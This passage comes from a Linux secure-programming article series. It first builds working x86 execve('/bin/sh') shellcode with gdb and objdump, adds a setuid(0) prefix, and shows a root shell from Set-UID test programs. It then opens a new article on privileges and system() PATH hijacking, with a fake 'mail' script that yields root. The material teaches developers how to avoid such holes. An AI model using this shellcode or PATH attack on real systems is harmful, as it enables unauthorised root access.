0x8048168 <main>:       push   %ebp
0x8048169 <main+1>:     mov    %esp,%ebp
0x804816b <main+3>:     sub    $0x8,%esp
0x804816e <main+6>:     movl   $0x0,0xfffffff8(%ebp)
0x8048175 <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x804817c <main+20>:    mov    $0x8071ea8,%edx
0x8048181 <main+25>:    mov    %edx,0xfffffff8(%ebp)
0x8048184 <main+28>:    push   $0x0
0x8048186 <main+30>:    lea    0xfffffff8(%ebp),%eax
0x8048189 <main+33>:    push   %eax
0x804818a <main+34>:    push   %edx
0x804818b <main+35>:    call   0x804d9ac <__execve>
0x8048190 <main+40>:    push   $0x0
0x8048192 <main+42>:    call   0x804d990 <_exit>
0x8048197 <main+47>:    nop
End of assembler dump.
(gdb)

The calls at addresses 0x804818b and 0x8048192 invoke the C library subroutines holding the real system-calls. Notice that the instruction 0x804817c : mov $0x8071ea8,%edx fills the %edx register with a value looking like an address. Let’s examine the memory content at this address, displaying it as a string :

(gdb) printf "%s\n", 0x8071ea8
/bin/sh
(gdb)

Now we know where the string is. Let’s have a look at the disassembly listings of the execve() and _exit() functions :

(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x804d9ac <__execve>:    push   %ebp
0x804d9ad <__execve+1>:  mov    %esp,%ebp
0x804d9af <__execve+3>:  push   %edi
0x804d9b0 <__execve+4>:  push   %ebx
0x804d9b1 <__execve+5>:  mov    0x8(%ebp),%edi
0x804d9b4 <__execve+8>:  mov    $0x0,%eax
0x804d9b9 <__execve+13>: test   %eax,%eax
0x804d9bb <__execve+15>: je     0x804d9c2 <__execve+22>
0x804d9bd <__execve+17>: call   0x0
0x804d9c2 <__execve+22>: mov    0xc(%ebp),%ecx
0x804d9c5 <__execve+25>: mov    0x10(%ebp),%edx
0x804d9c8 <__execve+28>: push   %ebx
0x804d9c9 <__execve+29>: mov    %edi,%ebx
0x804d9cb <__execve+31>: mov    $0xb,%eax
0x804d9d0 <__execve+36>: int    $0x80
0x804d9d2 <__execve+38>: pop    %ebx
0x804d9d3 <__execve+39>: mov    %eax,%ebx
0x804d9d5 <__execve+41>: cmp    $0xfffff000,%ebx
0x804d9db <__execve+47>: jbe    0x804d9eb <__execve+63>
0x804d9dd <__execve+49>: call   0x8048c84 <__errno_location>
0x804d9e2 <__execve+54>: neg    %ebx
0x804d9e4 <__execve+56>: mov    %ebx,(%eax)
0x804d9e6 <__execve+58>: mov    $0xffffffff,%ebx
0x804d9eb <__execve+63>: mov    %ebx,%eax
0x804d9ed <__execve+65>: lea    0xfffffff8(%ebp),%esp
0x804d9f0 <__execve+68>: pop    %ebx
0x804d9f1 <__execve+69>: pop    %edi
0x804d9f2 <__execve+70>: leave
0x804d9f3 <__execve+71>: ret
End of assembler dump.
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x804d990 <_exit>:      mov    %ebx,%edx
0x804d992 <_exit+2>:    mov    0x4(%esp,1),%ebx
0x804d996 <_exit+6>:    mov    $0x1,%eax
0x804d99b <_exit+11>:   int    $0x80
0x804d99d <_exit+13>:   mov    %edx,%ebx
0x804d99f <_exit+15>:   cmp    $0xfffff001,%eax
0x804d9a4 <_exit+20>:   jae    0x804dd90 <__syscall_error>
End of assembler dump.
(gdb) quit

The real kernel call is done through the 0x80 interrupt, at address 0x804d9d0 for execve() and at 0x804d99b for _exit(). This entry point is common to all system-calls, so the distinction is made with the content of the %eax register : for execve() it holds the value 0x0B, while for _exit() it holds 0x01.
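The same idea, a single entry point with the call selected by a number, is visible from C through the syscall() wrapper found on Linux with glibc. This is a sketch under that assumption; pid_via_syscall_number() is a name chosen for the example. Note that the numbers are architecture specific: 0x0B and 0x01 are the i386 values discussed here, so the example uses the SYS_getpid constant rather than a hard-coded number.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* for the syscall() declaration */
#endif
#include <sys/syscall.h>       /* SYS_getpid and friends */
#include <unistd.h>

/* Ask the kernel for our PID by system-call number
   instead of going through the getpid() wrapper. */
long pid_via_syscall_number(void)
{
    return syscall(SYS_getpid);
}
```

The value returned is the same as the one given by getpid(), which is just a library function placing the right number in the right register before entering the kernel.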

Diag. 4 : parameters of the execve() function

The analysis of these functions’ assembly instructions provides us with the parameters they use :

  • execve() needs various parameters (cf. diag 4) :
    • the %ebx register holds the address of the string representing the command to execute, “/bin/sh” in our example (0x804d9b1 : mov 0x8(%ebp),%edi followed by 0x804d9c9 : mov %edi,%ebx) ;
    • the %ecx register holds the address of the argument array (0x804d9c2 : mov 0xc(%ebp),%ecx). The first argument must be the program name and we need nothing else : an array holding the address of the “/bin/sh” string and a NULL pointer will be enough ;
    • the %edx register holds the address of the array representing the environment of the program to launch (0x804d9c5 : mov 0x10(%ebp),%edx). To keep our program simple, we’ll use an empty environment : a NULL pointer will do the trick.
  • the _exit() function ends the process and returns an exit code, held in the %ebx register, to its parent (usually a shell).

We then need the “/bin/sh” string, a pointer to this string and a NULL pointer (for the arguments since we have none and for the environment since we don’t define any). A possible data representation before the execve() call is the following : we build an array with a pointer to the /bin/sh string followed by a NULL pointer; %ebx points to the string, %ecx to the whole array, and %edx to the second item of the array (NULL). This is shown in diag. 5.

Diag. 5 : data representation relative to registers

Locating the shellcode within memory

The shellcode is usually inserted into a vulnerable program through a command line argument, an environment variable or a typed string. Anyway, when creating the shellcode, we don’t know the address it will use. Nevertheless, we must know the “/bin/sh” string address. A small trick allows us to get it.

When calling a subroutine with the call instruction, the CPU stores the return address in the stack, that is the address immediately following this call instruction (see above). Usually, the next step is to store the stack state (especially the %ebp register with the push %ebp instruction). To get the return address when entering the subroutine, it’s enough to unstack with the pop instruction. Of course, we then store our “/bin/sh” string immediately after the call instruction to allow our “home made prolog” to provide us with the required string address. That is :

 beginning_of_shellcode:
    jmp subroutine_call

 subroutine:
    popl %esi
    ...
    (Shellcode itself)
    ...
 subroutine_call:
    call subroutine
    /bin/sh

Of course, the subroutine is not a real one : either the execve() call succeeds and the process is replaced with a shell, or it fails and the _exit() function ends the program. The %esi register gives us the address of the “/bin/sh” string. Then, it’s enough to build the array right after the string : its first item (at %esi+8, the length of /bin/sh plus a null byte) holds the value of the %esi register, and its second, at %esi+12, a null address (32 bits). The code will look like :

    popl %esi
    movl %esi, 0x8(%esi)
    movl $0x00, 0xc(%esi)

Diagram 6 shows the data area :

Diag. 6 : data array
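The offsets used in the data area depend only on the length of the command string. The sketch below recomputes them for the 32-bit layout described here (4-byte pointers); struct data_layout and layout_for() are names introduced for this illustration.

```c
#include <stddef.h>
#include <string.h>

/* Offsets, relative to the start of the command string (%esi),
   of the three places the code writes to. */
struct data_layout {
    size_t nul_offset;     /* terminating null byte of the string  */
    size_t argv0_offset;   /* first array item: address of string  */
    size_t argv1_offset;   /* second array item: NULL pointer      */
};

struct data_layout layout_for(const char *command)
{
    const size_t pointer_size = 4;     /* assumed 32-bit pointers */
    struct data_layout l;

    l.nul_offset   = strlen(command);
    l.argv0_offset = l.nul_offset + 1;
    l.argv1_offset = l.argv0_offset + pointer_size;
    return l;
}
```

For “/bin/sh” this gives 7, 8 and 12, i.e. the 0x7, 0x8 and 0xc displacements applied to %esi in the code of this section.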

The null bytes problem

Vulnerable functions are often string manipulation routines such as strcpy(). To insert the code into the middle of the target application, the shellcode has to be copied as a string. However, these copy routines stop as soon as they find a null character. Then, our code must not have any. Using a few tricks will prevent us from writing null bytes. For example, the instruction

    movl $0x00, 0x0c(%esi)

will be replaced with

    xorl %eax, %eax
    movl %eax, 0x0c(%esi)

This example shows an explicit null byte in the source. However, translating some instructions to machine code can reveal others. For example, to distinguish the _exit(0) system-call from the others, the %eax register value is 1, as seen in the instruction
0x804d996 <_exit+6>: mov $0x1,%eax
Converted to hexadecimal, this instruction becomes :

 b8 01 00 00 00          mov    $0x1,%eax

You must then avoid its use. In fact, the trick is to initialize %eax from a register holding 0 and then increment it.
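Checking an instruction encoding for null bytes is a simple scan. The sketch below compares the two encodings discussed above; first_null_byte() and the two array names are assumptions made for the example.

```c
#include <stddef.h>

/* mov $0x1,%eax : the 32-bit immediate drags three null bytes along. */
const unsigned char mov_imm32[] = { 0xb8, 0x01, 0x00, 0x00, 0x00 };

/* xorl %eax,%eax ; incl %eax : same result, no null byte. */
const unsigned char xor_inc[] = { 0x31, 0xc0, 0x40 };

/* Return the index of the first null byte in code, or -1 if none.
   A string copy routine would stop copying at that index. */
long first_null_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0x00)
            return (long)i;
    }
    return -1;
}
```

The first sequence reports a null byte at index 2, so a strcpy()-style copy would only carry over its first two bytes. The second sequence reports -1.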

On the other hand, the “/bin/sh” string must end with a null byte. We can write one while creating the shellcode, but, depending on the mechanism used to insert it into a program, this null byte may not be present in the final application. It’s better to add one this way :

    /* movb only works on one byte */
    /* this instruction is equivalent to */
    /* movb %al, 0x07(%esi) */
    movb %eax, 0x07(%esi)

Building the shellcode

We now have everything to create our shellcode :

/* shellcode4.c */

int main()
{
  asm("jmp subroutine_call

subroutine:
    /* Getting /bin/sh address*/
        popl %esi
    /* Writing it as first item in the array */
        movl %esi,0x8(%esi)
    /* Writing NULL as second item in the array */
        xorl %eax,%eax
        movl %eax,0xc(%esi)
    /* Putting the null byte at the end of the string */
        movb %eax,0x7(%esi)
    /* execve() function */
        movb $0xb,%al
    /* String to execute in %ebx */
        movl %esi, %ebx
    /* Array arguments in %ecx */
        leal 0x8(%esi),%ecx
    /* Array environment in %edx */
        leal 0xc(%esi),%edx
    /* System-call */
        int  $0x80

    /* Null return code */
        xorl %ebx,%ebx
    /*  _exit() function : %eax = 1 */
        movl %ebx,%eax
        inc  %eax
    /* System-call */
        int  $0x80

subroutine_call:
        call subroutine
        .string \"/bin/sh\"
      ");
}

The code is compiled with “gcc -o shellcode4 shellcode4.c”. The command “objdump --disassemble shellcode4” lets us check that our binary no longer holds any null bytes :

08048398 <main>:
 8048398:   55                      pushl  %ebp
 8048399:   89 e5                   movl   %esp,%ebp
 804839b:   eb 1f                   jmp    80483bc <subroutine_call>

0804839d <subroutine>:
 804839d:   5e                      popl   %esi
 804839e:   89 76 08                movl   %esi,0x8(%esi)
 80483a1:   31 c0                   xorl   %eax,%eax
 80483a3:   89 46 0c                movl   %eax,0xc(%esi)
 80483a6:   88 46 07                movb   %al,0x7(%esi)
 80483a9:   b0 0b                   movb   $0xb,%al
 80483ab:   89 f3                   movl   %esi,%ebx
 80483ad:   8d 4e 08                leal   0x8(%esi),%ecx
 80483b0:   8d 56 0c                leal   0xc(%esi),%edx
 80483b3:   cd 80                   int    $0x80
 80483b5:   31 db                   xorl   %ebx,%ebx
 80483b7:   89 d8                   movl   %ebx,%eax
 80483b9:   40                      incl   %eax
 80483ba:   cd 80                   int    $0x80

080483bc <subroutine_call>:
 80483bc:   e8 dc ff ff ff          call   804839d <subroutine>
 80483c1:   2f                      das
 80483c2:   62 69 6e                boundl 0x6e(%ecx),%ebp
 80483c5:   2f                      das
 80483c6:   73 68                   jae    8048430 <_IO_stdin_used+0x14>
 80483c8:   00 c9                   addb   %cl,%cl
 80483ca:   c3                      ret
 80483cb:   90                      nop
 80483cc:   90                      nop
 80483cd:   90                      nop
 80483ce:   90                      nop
 80483cf:   90                      nop

The data found from address 80483c1 onwards doesn’t represent instructions, but the characters of the “/bin/sh” string (in hexadecimal, the sequence 2f 62 69 6e 2f 73 68 00) followed by random bytes. The code doesn’t hold any zeros, except the null character at the end of the string at 80483c8.

Now, let’s test our program :

$ ./shellcode4
Segmentation fault (core dumped)
$

Ooops! Not very conclusive. If we think a bit, we can see the memory area where the main() function is found (i.e. the text area mentioned at the beginning of this article) is read-only. The shellcode can not modify it. What can we do now, to test our shellcode?

To get round the read-only problem, the shellcode must be put in a data area. Let’s put it in an array declared as a global variable. We must use another trick to be able to execute the shellcode. Let’s replace the main() function return address found in the stack with the address of the array holding the shellcode. Don’t forget that the main function is a “standard” routine, called by pieces of code that the linker added. The return address is overwritten by writing the address of the character array two places below the stack’s first position.

  /* shellcode5.c */

  char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main()
  {
      int * ret;

      /* +2 will behave as a 2 words offset */
      /* (i.e. 8 bytes) to the top of the stack : */
      /*   - the first one for the reserved word for the
             local variable */
      /*   - the second one for the saved %ebp register */

      * ((int *) & ret + 2) = (int) shellcode;
      return (0);
  }

Now, we can test our shellcode :

$ cc shellcode5.c -o shellcode5
$ ./shellcode5
bash$ exit
$

We can even install the shellcode5 program Set-UID root, and check that the shell launched with the data handled by this program runs under the root identity :

$ su
Password:
# chown root.root shellcode5
# chmod +s shellcode5
# exit
$ ./shellcode5
bash# whoami
root
bash# exit
$

Generalization and last details

This shellcode is somewhat limited (well, it’s not too bad with so few bytes!). For instance, if our test program becomes :

  /* shellcode5bis.c */

  #include <unistd.h>

 char shellcode[] =
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main()
  {
      int * ret;
      seteuid(getuid());
      * ((int *) & ret + 2) = (int) shellcode;
      return (0);
  }

we fix the process effective UID to its real UID value, as we suggested in the previous article. This time, the shell is run without specific privileges :

$ su
Password:
# chown root.root shellcode5bis
# chmod +s shellcode5bis
# exit
$ ./shellcode5bis
bash# whoami
pappy
bash# exit
$

However, the seteuid(getuid()) instructions are not a very effective protection. One need only insert the equivalent of the setuid(0); call at the beginning of a shellcode to regain the rights linked to the initial EUID of a Set-UID application.

This instruction code is :

  char setuid[] =
         "\x31\xc0"       /* xorl %eax, %eax */
         "\x31\xdb"       /* xorl %ebx, %ebx */
         "\xb0\x17"       /* movb $0x17, %al */
         "\xcd\x80";      /* int  $0x80      */

Integrating it into our previous shellcode, our example becomes :

  /* shellcode6.c */

  #include <unistd.h>

  char shellcode[] =
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0) */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main()
  {
      int * ret;
      seteuid(getuid());
      * ((int *) & ret + 2) = (int) shellcode;
      return (0);
  }

Let’s check how it works :

$ su
Password:
# chown root.root shellcode6
# chmod +s shellcode6
# exit
$ ./shellcode6
bash# whoami
root
bash# exit
$
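On the defensive side, seteuid(getuid()) is weak because it only changes the effective UID and leaves the saved set-user-ID untouched, which is what lets a later setuid(0) succeed. A minimal sketch of a permanent drop for a Set-UID root program follows. It assumes Linux/POSIX setuid() semantics, where a process whose effective UID is root sets its real, effective and saved UIDs together. drop_privileges_permanently() is a name chosen for this example.

```c
#include <sys/types.h>
#include <unistd.h>

/* Give up root for good: returns 0 on success, -1 on failure. */
int drop_privileges_permanently(void)
{
    uid_t ruid = getuid();

    /* With a root effective UID, setuid() changes the real,
       effective AND saved UIDs (unlike seteuid()). */
    if (setuid(ruid) != 0)
        return -1;

    /* Paranoid check: if we are not really root, getting
       root back must now be refused by the kernel. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;

    return (geteuid() == ruid) ? 0 : -1;
}
```

A program that calls this before handling untrusted data no longer offers anything to regain with a setuid(0) prefix. Group privileges would need the same treatment with setgid(), done before the setuid() call.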

As shown in this last example, it’s possible to add functions to a shellcode, for instance, to leave the directory imposed by the chroot() function or to open a remote shell using a socket.

Such changes imply that the value of some bytes in the shellcode must be adapted to their use :

eb XX             jmp    <subroutine_call>
    XX = number of bytes to reach <subroutine_call>
<subroutine>:
5e                popl   %esi
89 76 XX          movl   %esi,XX(%esi)
    XX = position of the first item in the argument array (i.e. the command address). This offset is equal to the number of characters in the command, '\0' included.
31 c0             xorl   %eax,%eax
89 46 XX          movl   %eax,XX(%esi)
    XX = position of the second item in the array, here having a NULL value.
88 46 XX          movb   %al,XX(%esi)
    XX = position of the end-of-string '\0'.
b0 0b             movb   $0xb,%al
89 f3             movl   %esi,%ebx
8d 4e XX          leal   XX(%esi),%ecx
    XX = offset to reach the first item in the argument array and to put it in the %ecx register
8d 56 XX          leal   XX(%esi),%edx
    XX = offset to reach the second item in the argument array and to put it in the %edx register
cd 80             int    $0x80
31 db             xorl   %ebx,%ebx
89 d8             movl   %ebx,%eax
40                incl   %eax
cd 80             int    $0x80
<subroutine_call>:
e8 XX XX XX XX    call   <subroutine>
    these 4 bytes correspond to the number of bytes to reach <subroutine> (negative number, written in little endian)
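The displacement bytes of the jmp and call instructions can be recomputed from the addresses in the objdump listing of shellcode4. Both are relative to the address of the instruction that follows. The sketch below assumes the 2-byte short jmp (eb XX) and the 5-byte call (e8 XX XX XX XX) used here; the function names are made up for the illustration.

```c
#include <stdint.h>

/* Displacement stored in "e8 XX XX XX XX" located at call_addr. */
uint32_t call_rel32(uint32_t call_addr, uint32_t target)
{
    /* Unsigned arithmetic wraps modulo 2^32, which yields the
       two's complement encoding of a backward (negative) jump. */
    return (uint32_t)(target - (call_addr + 5u));
}

/* Displacement stored in "eb XX" located at jmp_addr. */
int jmp_rel8(uint32_t jmp_addr, uint32_t target)
{
    return (int)((int64_t)target - ((int64_t)jmp_addr + 2));
}

/* Byte number `index` (0 = first in memory) of a little-endian value. */
unsigned char le_byte(uint32_t value, unsigned index)
{
    return (unsigned char)((value >> (8u * index)) & 0xffu);
}
```

For the call at 80483bc targeting 804839d, call_rel32() gives 0xffffffdc, stored as dc ff ff ff. For the jmp at 804839b targeting 80483bc, jmp_rel8() gives 0x1f. Both values match the bytes in the listing.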

Conclusion

We wrote a program roughly 40 bytes long that is able to run any external command as root. Our last examples give some ideas about how to smash a stack. More details on this mechanism in the next article…

Avoiding security holes when developing an application – Part 1


Abstract:

This article is the first one in a series about the main types of security holes in applications. We’ll show the ways to avoid them by changing your development habits a little.


Introduction

Hardly two weeks go by without a major application that is part of most Linux distributions revealing a security hole allowing, for instance, a local user to become root. Despite the great quality of most of this software, ensuring the security of a program is a hard job : it must not allow a bad guy to benefit illegally from system resources. The availability of application source code is a good thing, much appreciated by programmers, but it means the smallest defects in software become visible to everyone. Furthermore, such defects are discovered by chance and the people finding them do not always have good intentions.

From the sysadmin side, daily work consists of reading the lists concerning security problems and immediately updating the involved packages. For a programmer it can be a good lesson to try out such security problems, since avoiding security holes from the beginning is better than fixing them afterwards. We’ll try to define some “classic” dangerous behaviors and provide solutions to reduce the risks. We won’t talk about network security problems since they often stem from configuration mistakes (dangerous cgi-bin scripts, …) or from system bugs allowing DoS (Denial of Service) attacks that prevent a machine from serving its own clients. These problems concern the sysadmin or the kernel developers. But the application programmer must also protect her code as soon as she takes into account external data. Some versions of pine, acroread, netscape, access, … have allowed elevated access or information leaks under some conditions. As a matter of fact, secure programming is everyone’s concern.

This set of articles shows methods which can be used to damage a Unix system. We could have only mentioned them or said a few words about them, but we prefer complete explanations to make people understand the risks. Thus, when debugging a program or developing your own, you’ll be able to avoid or correct these mistakes. For each hole discussed, we will take the same approach. We’ll start by detailing the way it works. Next, we will show how to avoid it. For every example we will use security holes still present in widespread software.

This first article talks about the basics needed for understanding security holes, that is the notion of privileges and the Set-UID or Set-GID bit. Next, we analyse the holes based on the system() function, since they are easier to understand.

We will often use small C programs to illustrate what we are talking about. However, the approaches mentioned in these articles are applicable to other programming languages : perl, java, shell scripts… Some security holes depend on a language, but this is not true for all of them, as we will see with system().

Privileges

On a Unix system, users are not equal, and neither are applications. Access to the file system nodes, and accordingly to the machine peripherals, relies on a strict identity control. Some users are allowed to do sensitive operations to maintain the system in good condition. A number called UID (User Identifier) allows the identification. To make things easier, a user name corresponds to this number; the association is done in the /etc/passwd file.

The UID of 0, with the default name of root, can access everything in the system. It can create, modify and remove every system node, but it can also manage the physical configuration of the machine : mounting partitions, activating network interfaces and changing their configuration (IP address), or using system calls such as mlock() to act on physical memory, or sched_setscheduler() to change the scheduling mechanism. In a future article we will study the Posix.1e features which allow limiting the privileges of an application executed as root, but for now, let’s assume the super-user can do everything on a machine.

The attacks we will mention are internal ones, that is, an authorized user on a machine tries to gain privileges he doesn’t have. Network attacks, on the other hand, are external ones, coming from people trying to connect to a machine they are not allowed on.

To use privileges reserved for another user without being able to log in under her identity, one must at least have the opportunity to talk to an application running under the victim’s UID. When an application (a process) runs under Linux, it has a well-defined identity. First, a process has an attribute called RUID (Real UID) corresponding to the ID of the user who launched it. This value is managed by the kernel and usually cannot change. A second attribute completes this information: the EUID (Effective UID), the identity the kernel takes into account when checking access rights (opening files, reserved system calls).
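The two identities can be read from within a program with getuid() and geteuid(). Here is a minimal sketch; the helper names identity_differs and print_identity are ours, chosen only for illustration:

```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 when the process runs with an Effective UID that differs
 * from its Real UID (typically a Set-UID program), 0 otherwise. */
int
identity_differs (void)
{
  return getuid () != geteuid ();
}

/* Prints both identities; uid_t is cast to long because its exact
 * width is not specified. */
void
print_identity (FILE * out)
{
  fprintf (out, "RUID=%ld EUID=%ld\n",
           (long) getuid (), (long) geteuid ());
}
```

Run from an ordinary executable, both values are the same; they only differ when the program file carries the Set-UID bit described below and is launched by someone other than its owner.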

To get the privileges of another user means everything will be done under the UID of that user, and not under one’s own UID. Of course, a cracker tries to get the root ID, but many other user accounts are of interest, either because they give access to system information (news, mail, lp…), because they allow reading private data (mail, personal files, etc.), or because they can be used to hide illegal activities such as attacks on other sites.

To run an application with an Effective UID different from its Real UID (the user who launched it), the executable file must have a specific bit turned on, called Set-UID. This bit is found in the file permission attribute (alongside the read, write and execute bits for the owner, the group members and others) and has the octal value 4000. The Set-UID bit is represented by an s when displaying the rights with the ls command :

>> ls -l /bin/su
-rwsr-xr-x  1 root  root  14124 Aug 18  1999 /bin/su
>>

The command “find / -type f -perm -4000” lists the system applications that have their Set-UID bit set (older versions of find also accepted the form “-perm +4000”, which current GNU find rejects). When the kernel runs an application with the Set-UID bit on, it uses the program owner’s identity as EUID for the process. The RUID, on the other hand, doesn’t change and corresponds to the user who launched the program. For instance, every user can run the /bin/su command, but it runs under its owner’s identity (root) with every privilege on the system. Needless to say, one must be very careful when writing a program with this attribute.

Each process also has an effective group ID, EGID, and a real group ID, RGID. The Set-GID bit (2000 in octal) in the access rights of an executable file asks the kernel to use the file’s group as EGID, and not the GID of the user who launched the program. A curious combination sometimes appears, with the Set-GID bit set but without the group execute bit. This is a convention that has nothing to do with application privileges: it indicates that locks placed on the file with fcntl(fd, F_SETLK, lock) are to be strictly enforced (mandatory locking). Usually an application doesn’t use the Set-GID bit, but it does happen sometimes. Some games, for instance, use it to save the best scores into a system directory.
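The bits discussed above can be tested on a file mode with the standard S_ISUID, S_ISGID and S_IXGRP masks. The sketch below is only an illustration: the ID_BIT_* constants and the functions classify_mode and classify_file are hypothetical names, not an existing API.

```c
#include <sys/stat.h>
#include <sys/types.h>

/* Hypothetical flags describing what the special bits mean. */
enum {
  ID_BIT_NONE    = 0,
  ID_BIT_SETUID  = 1,  /* process gets the file owner's UID as EUID   */
  ID_BIT_SETGID  = 2,  /* process gets the file's group as EGID       */
  ID_BIT_LOCKING = 4   /* Set-GID without group execute: lock marker  */
};

/* Interprets the Set-UID / Set-GID bits of a permission mode. */
int
classify_mode (mode_t mode)
{
  int flags = ID_BIT_NONE;

  if (mode & S_ISUID)
    flags |= ID_BIT_SETUID;
  if (mode & S_ISGID) {
    if (mode & S_IXGRP)
      flags |= ID_BIT_SETGID;
    else
      flags |= ID_BIT_LOCKING;
  }
  return flags;
}

/* Same thing for a file on disk; returns -1 if stat() fails. */
int
classify_file (const char * path)
{
  struct stat st;

  if (stat (path, & st) != 0)
    return -1;
  return classify_mode (st.st_mode);
}
```

With this sketch, classify_mode (04755) reports a Set-UID program, while classify_mode (02644) reports the locking convention rather than a privilege change.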

Type of attacks and potential targets

There are various types of attacks against a system. Today we’ll study the mechanisms used to execute an external command from within an application. This is usually a shell running under the identity of the owner of the application. A second type of attack relies on buffer overflows, giving the attacker the ability to run his own code. Last, the third main type of attack is based on race conditions: a lapse of time between two instructions during which a system component (usually a file) is changed while the application believes it remains the same.

The first two types of attacks often try to execute a shell with the application owner’s privileges, while the third one instead aims at getting write access to protected system files. Read access alone is sometimes considered a security weakness as well (personal files, emails, the password file /etc/shadow, and pseudo kernel configuration files in /proc).

The targets of security attacks are mostly programs having the Set-UID (or Set-GID) bit on. However, this also affects every application running under an ID different from that of its user. System daemons represent a large share of these programs. A daemon is an application usually started at boot time, running in the background without any controlling terminal, and doing privileged work for any user. For instance, the lpd daemon allows every user to send documents to the printer, sendmail receives and redirects electronic mail, and apmd asks the BIOS for the battery status of a laptop. Some daemons are in charge of communication with external users through the network (FTP, HTTP, Telnet… services). A server called inetd manages the connections of many of these services.

We can then conclude that a program can be attacked as soon as it talks – even briefly – to a user different from the one who started it. While developing this type of application you must be careful to keep in mind the risks presented by the functions we will study here.

Changing privilege levels

When an application runs with an EUID different from its RUID, it is to provide the user with privileges he needs but doesn’t have (file access, reserved system calls…). However, these privileges are only needed for a very short time, for instance when opening a file; the rest of the time the application can run with its user’s privileges. It’s possible to temporarily change an application’s EUID with the system call :

  int seteuid (uid_t uid);

A process can always set its EUID to the value of its RUID. In that case, the old EUID is kept in a field called the SUID (Saved UID), not to be confused with the SID (Session ID) used for control terminal management. It’s always possible to copy the SUID back into the EUID. Of course, a program with an EUID of 0 (root) can change both its EUID and RUID at will (this is how /bin/su works).

To reduce the risk of attacks, it’s advisable to give up the privileged EUID and run with the RUID of the user instead. When a portion of code needs the privileges of the file’s owner, the Saved UID can be put back into the EUID. Here is an example :

  #include <sys/types.h>
  #include <unistd.h>

  uid_t e_uid_initial;
  uid_t r_uid;

  void privileged_function (void);

  int
  main (int argc, char * argv [])
  {
    /* Saves the different UIDs */
    e_uid_initial = geteuid ();
    r_uid = getuid ();

    /* limits access rights to the ones of the
     * user launching the program */
    seteuid (r_uid);
    ...
    privileged_function ();
    ...
  }

  void
  privileged_function (void)
  {
    /* Gets initial privileges back */
    seteuid (e_uid_initial);
    ...
    /* Portion needing privileges */
    ...
    /* Back to the rights of the runner */
    seteuid (r_uid);
  }

This method is much more secure than the unfortunately all too common one of keeping the initial EUID and temporarily reducing the privileges just before a “risky” operation. However, this privilege reduction is useless against buffer-overflow attacks. As we’ll see in a later article, these attacks aim to make the application execute the attacker’s own instructions, which can include the system calls needed to raise the privilege level again. Nevertheless, this approach protects against external commands and most race conditions.
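The example above ignores the value returned by seteuid(). Since a failed call would leave the program running with more privileges than intended, a more defensive variant checks every call. This is only a sketch: privileges_drop and privileges_restore are names we made up, and the code assumes it is used from a single thread.

```c
#include <sys/types.h>
#include <unistd.h>

static uid_t privileged_euid;   /* EUID the program was started with */
static int   euid_recorded = 0; /* set once the value above is valid */

/* Switches the EUID to the RUID of the caller. The initial EUID is
 * recorded on the first call only, so calling this twice is harmless.
 * Returns 0 on success, -1 if the change did not take effect. */
int
privileges_drop (void)
{
  if (! euid_recorded) {
    privileged_euid = geteuid ();
    euid_recorded = 1;
  }
  if (seteuid (getuid ()) != 0)
    return -1;
  return (geteuid () == getuid ()) ? 0 : -1;
}

/* Puts the recorded EUID back for a short privileged section.
 * Returns 0 on success, -1 otherwise. */
int
privileges_restore (void)
{
  if (! euid_recorded)
    return -1;
  if (seteuid (privileged_euid) != 0)
    return -1;
  return (geteuid () == privileged_euid) ? 0 : -1;
}
```

A program would call privileges_drop () first thing in main (), then surround each privileged portion with privileges_restore () and privileges_drop (), aborting if either one returns -1.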

Running external commands

An application often needs to call an external system service. A well-known example is the mail command, used to send an e-mail (run report, alarm, statistics, etc.) without requiring a complex dialog with the mail system. The easiest solution is to use the library function :

  int system (const char * command);

Dangers of the system() function

This function is rather dangerous: it calls the shell to execute the command given as an argument, and the shell’s behavior depends on choices made by the user. A typical example comes from the PATH environment variable. Let’s look at an application calling the mail command. For instance, the following program sends its source code to the user who launched it :

/* system1.c */

#include <stdio.h>
#include <stdlib.h>

int
main (void)
{
  if (system ("mail $USER < system1.c") != 0)
    perror ("system");
  return (0);
}

Let’s say this program is Set-UID root :

>> cc system1.c -o system1
>> su
Password:
[root] chown root.root system1
[root] chmod +s system1
[root] exit
>> ls -l system1
-rwsrwsr-x  1 root  root  11831  Oct 16  17:25 system1
>>

To execute this command, system() runs a shell (/bin/sh) with the -c option followed by the instruction to invoke. The shell then goes through the directories listed in the PATH environment variable to find an executable called mail. To compromise the program, the user only has to change this variable’s content before running the application. For example :

  >> export PATH=.
  >> ./system1

looks for the mail command only within the current directory. One need merely create an executable file (for instance, a script running a new shell) and name it mail, and it will then be executed with the main application owner’s EUID! Here, our script runs /bin/sh. However, since it’s executed with a redirected standard input (like the initial mail command), we must reconnect it to the terminal. We then create the script :

#! /bin/sh
# "mail" script running a shell
# getting its standard input back.
/bin/sh < /dev/tty

Here is the result :

>> export PATH="."
>> ./system1
bash# /usr/bin/whoami
  root
bash#
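To see why the attack works, it helps to spell out the search the shell performs. The function below is a simplified sketch of that lookup, not the shell’s actual code: resolve_in_path is a hypothetical helper, and it only checks that an entry is executable, without verifying that it is a regular file.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Looks for `name` in each directory of the colon-separated list
 * `path_var`, in order. An empty element stands for the current
 * directory. On success the first match is written to `out` and 0 is
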